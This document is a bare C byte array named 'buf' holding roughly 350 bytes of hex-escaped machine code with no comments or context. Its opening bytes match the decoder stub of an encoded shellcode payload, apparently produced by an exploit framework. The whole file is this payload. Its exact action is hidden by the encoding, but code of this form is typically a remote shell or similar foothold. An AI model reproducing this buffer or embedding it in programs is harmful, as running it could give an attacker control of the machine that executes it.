unsigned char buf[] = 
"\xda\xce\xd9\x74\x24\xf4\x5e\xba\x4c\xd7\x16\xb3\x29\xc9\xb1"
"\x52\x83\xee\xfc\x31\x56\x13\x03\x1a\xc4\xf4\x46\x5e\x02\x7a"
"\xa8\x9e\xd3\x1b\x20\x7b\xe2\x1b\x56\x08\x55\xac\x1c\x5c\x5a"
"\x47\x70\x74\xe9\x25\x5d\x7b\x5a\x83\xbb\xb2\x5b\xb8\xf8\xd5"
"\xdf\xc3\x2c\x35\xe1\x0b\x21\x34\x26\x71\xc8\x64\xff\xfd\x7f"
"\x98\x74\x4b\xbc\x13\xc6\x5d\xc4\xc0\x9f\x5c\xe5\x57\xab\x06"
"\x25\x56\x78\x33\x6c\x40\x9d\x7e\x26\xfb\x55\xf4\xb9\x2d\xa4"
"\xf5\x16\x10\x08\x04\x66\x55\xaf\xf7\x1d\xaf\xd3\x8a\x25\x74"
"\xa9\x50\xa3\x6e\x09\x12\x13\x4a\xab\xf7\xc2\x19\xa7\xbc\x81"
"\x45\xa4\x43\x45\xfe\xd0\xc8\x68\xd0\x50\x8a\x4e\xf4\x39\x48"
"\xee\xad\xe7\x3f\x0f\xad\x47\x9f\xb5\xa6\x6a\xf4\xc7\xe5\xe2"
"\x39\xea\x15\xf3\x55\x7d\x66\xc1\xfa\xd5\xe0\x69\x72\xf0\xf7"
"\x8e\xa9\x44\x67\x71\x52\xb5\xae\xb6\x06\xe5\xd8\x1f\x27\x6e"
"\x18\x9f\xf2\x21\x48\x0f\xad\x81\x38\xef\x1d\x6a\x52\xe0\x42"
"\x8a\x5d\x2a\xeb\x21\xa4\xbd\x1e\xbd\xa6\xf7\x77\xc3\xa6\x06"
"\x33\x4a\x40\x62\x53\x1b\xdb\x1b\xca\x06\x97\xba\x13\x9d\xd2"
"\xfd\x98\x12\x23\xb3\x68\x5e\x37\x24\x99\x15\x65\xe3\xa6\x83"
"\x01\x6f\x34\x48\xd1\xe6\x25\xc7\x86\xaf\x98\x1e\x42\x42\x82"
"\x88\x70\x9f\x52\xf2\x30\x44\xa7\xfd\xb9\x09\x93\xd9\xa9\xd7"
"\x1c\x66\x9d\x87\x4a\x30\x4b\x6e\x25\xf2\x25\x38\x9a\x5c\xa1"
"\xbd\xd0\x5e\xb7\xc1\x3c\x29\x57\x73\xe9\x6c\x68\xbc\x7d\x79"
"\x11\xa0\x1d\x86\xc8\x60\x2d\xcd\x50\xc0\xa6\x88\x01\x50\xab"
"\x2a\xfc\x97\xd2\xa8\xf4\x67\x21\xb0\x7d\x6d\x6d\x76\x6e\x1f"
"\xfe\x13\x90\x8c\xff\x31";
